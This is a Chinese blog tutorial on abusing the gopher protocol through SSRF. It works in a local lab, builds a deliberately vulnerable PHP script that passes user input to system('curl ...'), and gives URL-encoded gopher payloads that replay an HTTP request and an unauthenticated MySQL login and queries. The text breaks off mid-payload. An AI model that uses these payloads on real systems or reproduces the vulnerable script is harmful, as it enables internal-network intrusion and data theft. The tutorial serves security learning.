<!DOCTYPE html>




<html class="theme-next gemini" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SSRF,">










<meta name="description" content="var ap = new APlayer({             element: document.getElementById(&quot;aplayer-nYQIwznb&quot;),             narrow: false,             autoplay: false,             s">
<meta name="keywords" content="SSRF">
<meta property="og:type" content="article">
<meta property="og:title" content="对万金油gopher协议的理解与应用">
<meta property="og:url" content="http://yoursite.com/2019/05/31/对万金油gopher协议的理解与应用/index.html">
<meta property="og:site_name" content="故人梦">
<meta property="og:description" content="var ap = new APlayer({             element: document.getElementById(&quot;aplayer-nYQIwznb&quot;),             narrow: false,             autoplay: false,             s">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://k-ring.github.io/img/go1.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go2.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go3.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go4.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go5.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go6.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go7.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go8.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go9.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/go10.jpg">
<meta property="og:updated_time" content="2019-06-01T01:11:23.404Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="对万金油gopher协议的理解与应用">
<meta name="twitter:description" content="var ap = new APlayer({             element: document.getElementById(&quot;aplayer-nYQIwznb&quot;),             narrow: false,             autoplay: false,             s">
<meta name="twitter:image" content="https://k-ring.github.io/img/go1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/05/31/对万金油gopher协议的理解与应用/">





  <title>对万金油gopher协议的理解与应用 | 故人梦</title>
  








<link rel="stylesheet" href="\assets\css\APlayer.min.css" class="aplayer-style-marker">
<script src="\assets\js\APlayer.min.js" class="aplayer-script-marker"></script>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">故人梦</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">至今朝，忆往昔、</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-resources">
          <a href="/resources/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-modx"></i> <br>
            
            资源
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br>
            
            友链
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/05/31/对万金油gopher协议的理解与应用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="故人梦">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="故人梦">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">对万金油gopher协议的理解与应用</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-31T00:00:00+08:00">
                2019-05-31
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/协议/" itemprop="url" rel="index">
                    <span itemprop="name">协议</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3,049 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  16 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        
        <div id="aplayer-nYQIwznb" class="aplayer aplayer-tag-marker" style="margin-bottom: 20px;">
            <pre class="aplayer-lrc-content"></pre>
        </div>
        <script>
          var ap = new APlayer({
            element: document.getElementById("aplayer-nYQIwznb"),
            narrow: false,
            autoplay: false,
            showlrc: false,
            music: {
              title: "Burn It Down",
              author: "Linkin Park",
              url: "https://link.hhtjim.com/163/4151845.mp3",
              pic: "https://k-ring.github.io/img/music.jpg",
              lrc: ""
            }
          });
          window.aplayers || (window.aplayers = []);
          window.aplayers.push(ap);
        </script>
<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>之前不理解他们为什么要将gopher协议称为万金油，那个时候对gopher一无所知，但是在ctf和实际挖洞过程中总是能碰到ssrf，再Google一下gopher常见的运用场景    </p>
<a id="more"></a>
<p><img src="https://k-ring.github.io/img/go1.jpg" alt><br>让我觉得有必要认识一下这位万金油。  </p>
<p>通过我看的一些文章，我大概理解到万金油的意思应该就是在某些场景它的应用非常灵活和广泛，通过构造我们想要发送的数据包，利用gopher协议发送，就能实现我们想要的请求(我乱说的，我也不知道)。  </p>
<p>比如，利用gopher实现：GET请求，POST请求，内网的redis，mysql(以及各类关系型数据库)未授权访问，以及MongoDB，Memcache等  </p>
<h3 id="gopher协议"><a href="#gopher协议" class="headerlink" title="gopher协议"></a>gopher协议</h3><p>gopher协议的格式：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:70/_ + TCP/IP数据</span><br></pre></td></tr></table></figure></p>
<p>gopher的默认端口为70，如果没有指定端口，比如<code>gopher://127.0.0.1/_test</code>默认是发送给70端口的<br><img src="https://k-ring.github.io/img/go2.jpg" alt>    </p>
<p>这里的<code>_</code>是一种数据连接格式，不一定是<code>_</code>，其他任意字符都行，例如这里以<code>1</code>作为连接字符：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# curl gopher://127.0.0.1/1test</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/go3.jpg" alt>  </p>
<p>gopher协议的实现：<br>gopher会将后面的数据部分发送给相应的端口，这些数据可以是字符串，也可以是其他的数据请求包，比如GET，POST请求，redis，mysql未授权访问等，同时数据部分必须要进行url编码，这样gopher协议才能正确解析。  </p>
<h3 id="在实例中认识与实践gopher"><a href="#在实例中认识与实践gopher" class="headerlink" title="在实例中认识与实践gopher"></a>在实例中认识与实践gopher</h3><p>支持gopher协议的有 <code>curl</code> 和 libcurl<code>，本文测试使用</code>curl`。  </p>
<h4 id="对于内网web的GET请求-通常构造gopher用来请求内网"><a href="#对于内网web的GET请求-通常构造gopher用来请求内网" class="headerlink" title="对于内网web的GET请求(通常构造gopher用来请求内网)"></a>对于内网web的GET请求(通常构造gopher用来请求内网)</h4><p>测试代码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> $_GET[<span class="string">'test'</span>];</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>正常请求抓包：<br><img src="https://k-ring.github.io/img/go4.jpg" alt>  </p>
<p>构造gopher本地请求(将数据包进行url编码)：<br>请求包内容：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /index.php?test=<span class="number">123</span> HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">Pragma: no-cache</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Upgrade-Insecure-Requests: <span class="number">1</span></span><br><span class="line">User-Agent: Mozilla/<span class="number">5.0</span> (Windows NT <span class="number">10.0</span>; Win64; x64) AppleWebKit/<span class="number">537.36</span> (KHTML, like Gecko) Chrome/<span class="number">74.0</span><span class="number">.3729</span><span class="number">.169</span> Safari/<span class="number">537.36</span></span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=<span class="number">0.9</span>,image/webp,image/apng,*<span class="comment">/*;q=0.8,application/signed-exchange;v=b3</span></span><br><span class="line"><span class="comment">Accept-Encoding: gzip, deflate</span></span><br><span class="line"><span class="comment">Accept-Language: zh-CN,zh;q=0.9</span></span><br><span class="line"><span class="comment">Connection: close</span></span><br></pre></td></tr></table></figure></p>
<p>然后对数据编码发送gopher(我自己写了一个脚本，放在文末)：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl gopher:<span class="comment">//127.0.0.1:80/_%47%45%54%20%2f%69%6e%64%65%78%2e%70%68%70%3f%74%65%73%74%3d%31%32%33%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%0d%0a%55%70%67%72%61%64%65%2d%49%6e%73%65%63%75%72%65%2d%52%65%71%75%65%73%74%73%3a%20%31%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%4d%6f%7a%69%6c%6c%61%2f%35%2e%30%20%28%57%69%6e%64%6f%77%73%20%4e%54%20%31%30%2e%30%3b%20%57%69%6e%36%34%3b%20%78%36%34%29%20%41%70%70%6c%65%57%65%62%4b%69%74%2f%35%33%37%2e%33%36%20%28%4b%48%54%4d%4c%2c%20%6c%69%6b%65%20%47%65%63%6b%6f%29%20%43%68%72%6f%6d%65%2f%37%34%2e%30%2e%33%37%32%39%2e%31%36%39%20%53%61%66%61%72%69%2f%35%33%37%2e%33%36%0d%0a%41%63%63%65%70%74%3a%20%74%65%78%74%2f%68%74%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%68%74%6d%6c%2b%78%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%6d%6c%3b%71%3d%30%2e%39%2c%69%6d%61%67%65%2f%77%65%62%70%2c%69%6d%61%67%65%2f%61%70%6e%67%2c%2a%2f%2a%3b%71%3d%30%2e%38%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%69%67%6e%65%64%2d%65%78%63%68%61%6e%67%65%3b%76%3d%62%33%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%2d%4c%61%6e%67%75%61%67%65%3a%20%7a%68%2d%43%4e%2c%7a%68%3b%71%3d%30%2e%39%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%0d%0a%0d%0a</span></span><br></pre></td></tr></table></figure></p>
<p>服务器正常响应：<br><img src="https://k-ring.github.io/img/go5.jpg" alt>  </p>
<p><strong>服务器本地访问，这也就解释了当服务器在存在ssrf漏洞的时候(服务器请求伪造漏洞)，可以通过gopher协议访问内网或者直接刺穿内网(通过存在未授权访问的redis，mysql等)。</strong>   </p>
<p>POST请求同理。</p>
<h4 id="攻击内网无密码验证的MySQL服务"><a href="#攻击内网无密码验证的MySQL服务" class="headerlink" title="攻击内网无密码验证的MySQL服务"></a>攻击内网无密码验证的MySQL服务</h4><p>关于MySQL的通信协议网上大佬都总结的很好，我参考了paper上一片文章：  </p>
<ul>
<li><a href="https://paper.seebug.org/510/#01" target="_blank" rel="noopener">https://paper.seebug.org/510/#01</a>  </li>
</ul>
<p>使用gopher向3306端口发送访问MySQL的TCP/IP数据包。  </p>
<p>实验环境：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">服务器    kali虚拟机     192.168.159.131     存在ssrf，内网存在无密码验证的MySQL服务</span><br><span class="line">客户端(攻击者)    windows10物理机     192.168.100.159</span><br></pre></td></tr></table></figure></p>
<p>准备工作：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//存在ssrf漏洞文件 </span></span><br><span class="line"><span class="comment">//ssrf.php:  </span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    system(<span class="string">"curl $_GET[url]"</span>);</span><br><span class="line">    <span class="comment">//由于php高版本不支持gopher协议，捣鼓了半天也没搞出个名堂</span></span><br><span class="line">    <span class="comment">//出此下策，一个高仿的ssrf gopher协议利用</span></span><br><span class="line">    <span class="comment">//由此得出，gopher协议在逐步被淘汰。</span></span><br><span class="line">    <span class="comment">//$ch = curl_init();</span></span><br><span class="line">    <span class="comment">//curl_setopt($ch, CURLOPT_URL, $_GET["url"]);</span></span><br><span class="line">    <span class="comment">//curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span></span><br><span class="line">    <span class="comment">//curl_setopt($ch, CURLOPT_HEADER, 0);</span></span><br><span class="line">    <span class="comment">//$output = curl_exec($ch);</span></span><br><span class="line">    <span class="comment">//echo $output;      //回显，将结果打印出来</span></span><br><span class="line">    <span class="comment">//curl_close($ch);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">使用root登录mysql，新建一个只允许本地登录的无密码的mysql用户，用于测试：</span><br><span class="line"></span><br><span class="line">mysql&gt; create user &apos;gurenmeng&apos;@&apos;localhost&apos;;</span><br><span class="line">mysql&gt; grant usage on *.* to &apos;gurenmeng&apos;@&apos;localhost&apos;;</span><br><span class="line">mysql&gt; grant all on *.* to &apos;gurenmeng&apos;@&apos;localhost&apos;</span><br></pre></td></tr></table></figure>
<p>准备工作完成，接下来开始测试：  </p>
<p>1、首先通过本地抓包模拟要发送的数据包<br>因为本地测试，就简单点，我直接在kali上面抓取要发送的TCP数据包<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">在一个窗口抓本地3306的tcp数据包：</span><br><span class="line"></span><br><span class="line">tcpdump -i lo -l port 3306 -w mysql.pcap</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">在另一个窗口使用TCP/IP认证访问：</span><br><span class="line"></span><br><span class="line">kali&gt; mysql -h 127.0.0.1 -u gurenmeng</span><br><span class="line">mysql&gt; use gurenmeng;</span><br><span class="line">mysql&gt; select * from grm_admin;</span><br><span class="line">mysql&gt; exit</span><br></pre></td></tr></table></figure>
<p>然后用wireshark打开数据包：<br><img src="https://k-ring.github.io/img/go6.jpg" alt>  </p>
<p>右键跟踪tcp流：<br><img src="https://k-ring.github.io/img/go7.jpg" alt>  </p>
<p>可以看到这就是我们访问mysql的数据包，然后将我们发送的请求提取出来进行gopher协议发送<br><img src="https://k-ring.github.io/img/go8.jpg" alt>  </p>
<p>这里只需要我们发送的请求的数据，提取出原始字符串，合并为一段字符串，每两个字符前面加一个%，就是将我们的请求进行了url编码(url编码就是字符的十六进制加上%)；然后通过gopher协议发送tcp数据包：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url编码数据：%bf%<span class="number">00</span>%<span class="number">00</span>%<span class="number">01</span>%<span class="number">84</span>%a6%<span class="number">9</span>f%<span class="number">20</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">01</span>%<span class="number">2</span>d%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">07</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">67</span>%<span class="number">75</span>%<span class="number">72</span>%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">6</span>d%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">67</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">6</span>d%<span class="number">79</span>%<span class="number">73</span>%<span class="number">71</span>%<span class="number">6</span>c%<span class="number">5</span>f%<span class="number">6</span>e%<span class="number">61</span>%<span class="number">74</span>%<span class="number">69</span>%<span class="number">76</span>%<span class="number">65</span>%<span class="number">5</span>f%<span class="number">70</span>%<span class="number">61</span>%<span class="number">73</span>%<span class="number">73</span>%<span class="number">77</span>%<span class="number">6</span>f%<span class="number">72</span>%<span class="number">64</span>%<span class="number">00</span>%<span class="number">7</span>d%<span class="number">03</span>%<span class="number">5</span>f%<span class="number">6</span>f%<span class="number">73</span>%<span class="number">05</span>%<span class="number">4</span>c%<span class="number">69</span>%<span class="number">6</span>e%<span class="number">75</span>%<span class="number">78</span>%<span class="number">0</span>c%<span class="number">5</span>f%<span class="number">63</span>%<span class="number">6</span>c%<span class="number">69</span>%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">74</span>%<span class="number">5</span>f%<span class="number">6</span>e%<span class="number">61</span>%<span class="number">6</span>d%<span class="number">65</span>%<span class="number">0</span>a%<span class="number">6</span>c%<span class="number">69</span>%<span class="number">62</span>%<span class="number">6</span>d%<span class="number">61</span>%<span class="number">72</span>%<span class="number">69</span>%<span class="number">61</span>%<span class="number">64</span>%<span class="number">62</span>%<span class="number">04</span>%<span class="number">5</span>f%<span class="number">70</span>%<span class="number">69</span>%<span class="number">64</span>%<span class="number">04</span>%<span class="number">37</span>%<span class="number">31</span>%<span class="number">37</span>%<span class="number">35</span>%<span class="number">0</span>f%<span class="number">5</span>f%<span class="number">63</span>%<span class="number">6</span>c%<span class="number">69</span>%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">74</span>%<span class="number">5</span>f%<span class="number">76</span>%<span class="number">65</span>%<span class="number">72</span>%<span class="number">73</span>%<span class="number">69</span>%<span class="number">6</span>f%<span class="number">6</span>e%<span class="number">05</span>%<span class="number">33</span>%<span class="number">2</span>e%<span class="number">30</span>%<span class="number">2</span>e%<span class="number">39</span>%<span class="number">09</span>%<span class="number">5</span>f%<span class="number">70</span>%<span class="number">6</span>c%<span class="number">61</span>%<span class="number">74</span>%<span class="number">66</span>%<span class="number">6</span>f%<span class="number">72</span>%<span class="number">6</span>d%<span class="number">06</span>%<span class="number">78</span>%<span class="number">38</span>%<span class="number">36</span>%<span class="number">5</span>f%<span class="number">36</span>%<span class="number">34</span>%<span class="number">0</span>c%<span class="number">70</span>%<span class="number">72</span>%<span class="number">6</span>f%<span class="number">67</span>%<span class="number">72</span>%<span class="number">61</span>%<span class="number">6</span>d%<span class="number">5</span>f%<span class="number">6</span>e%<span class="number">61</span>%<span class="number">6</span>d%<span class="number">65</span>%<span class="number">05</span>%<span class="number">6</span>d%<span class="number">79</span>%<span class="number">73</span>%<span class="number">71</span>%<span class="number">6</span>c%<span class="number">0</span>c%<span class="number">5</span>f%<span class="number">73</span>%<span class="number">65</span>%<span class="number">72</span>%<span class="number">76</span>%<span class="number">65</span>%<span class="number">72</span>%<span class="number">5</span>f%<span class="number">68</span>%<span class="number">6</span>f%<span class="number">73</span>%<span class="number">74</span>%<span class="number">09</span>%<span class="number">31</span>%<span class="number">32</span>%<span class="number">37</span>%<span class="number">2</span>e%<span class="number">30</span>%<span class="number">2</span>e%<span class="number">30</span>%<span class="number">2</span>e%<span class="number">31</span>%<span class="number">21</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">03</span>%<span class="number">73</span>%<span class="number">65</span>%<span class="number">6</span>c%<span class="number">65</span>%<span class="number">63</span>%<span class="number">74</span>%<span class="number">20</span>%<span class="number">40</span>%<span class="number">40</span>%<span class="number">76</span>%<span class="number">65</span>%<span class="number">72</span>%<span class="number">73</span>%<span class="number">69</span>%<span class="number">6</span>f%<span class="number">6</span>e%<span class="number">5</span>f%<span class="number">63</span>%<span class="number">6</span>f%<span class="number">6</span>d%<span class="number">6</span>d%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">74</span>%<span class="number">20</span>%<span class="number">6</span>c%<span class="number">69</span>%<span class="number">6</span>d%<span class="number">69</span>%<span class="number">74</span>%<span class="number">20</span>%<span class="number">31</span>%<span class="number">12</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">03</span>%<span class="number">53</span>%<span class="number">45</span>%<span class="number">4</span>c%<span class="number">45</span>%<span class="number">43</span>%<span class="number">54</span>%<span class="number">20</span>%<span class="number">44</span>%<span class="number">41</span>%<span class="number">54</span>%<span class="number">41</span>%<span class="number">42</span>%<span class="number">41</span>%<span class="number">53</span>%<span class="number">45</span>%<span class="number">28</span>%<span class="number">29</span>%<span class="number">0</span>a%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">02</span>%<span class="number">67</span>%<span class="number">75</span>%<span class="number">72</span>%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">6</span>d%<span class="number">65</span>%<span class="number">6</span>e%<span class="number">67</span>%<span class="number">0</span>f%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">03</span>%<span class="number">73</span>%<span class="number">68</span>%<span class="number">6</span>f%<span class="number">77</span>%<span class="number">20</span>%<span class="number">64</span>%<span class="number">61</span>%<span class="number">74</span>%<span class="number">61</span>%<span class="number">62</span>%<span class="number">61</span>%<span class="number">73</span>%<span class="number">65</span>%<span class="number">73</span>%<span class="number">0</span>c%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">03</span>%<span class="number">73</span>%<span class="number">68</span>%<span class="number">6</span>f%<span class="number">77</span>%<span class="number">20</span>%<span class="number">74</span>%<span class="number">61</span>%<span class="number">62</span>%<span class="number">6</span>c%<span class="number">65</span>%<span class="number">73</span>%<span class="number">0</span>b%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">04</span>%<span class="number">67</span>%<span class="number">72</span>%<span class="number">6</span>d%<span class="number">5</span>f%<span class="number">61</span>%<span class="number">64</span>%<span class="number">6</span>d%<span class="number">69</span>%<span class="number">6</span>e%<span class="number">00</span>%<span class="number">18</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">03</span>%<span class="number">73</span>%<span class="number">65</span>%<span class="number">6</span>c%<span class="number">65</span>%<span class="number">63</span>%<span class="number">74</span>%<span class="number">20</span>%<span class="number">2</span>a%<span class="number">20</span>%<span class="number">66</span>%<span class="number">72</span>%<span class="number">6</span>f%<span class="number">6</span>d%<span class="number">20</span>%<span class="number">67</span>%<span class="number">72</span>%<span class="number">6</span>d%<span class="number">5</span>f%<span class="number">61</span>%<span class="number">64</span>%<span class="number">6</span>d%<span class="number">69</span>%<span class="number">6</span>e%<span class="number">01</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">00</span>%<span class="number">01</span></span><br></pre></td></tr></table></figure></p>
<p>在本地终端上测试：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：curl gopher:<span 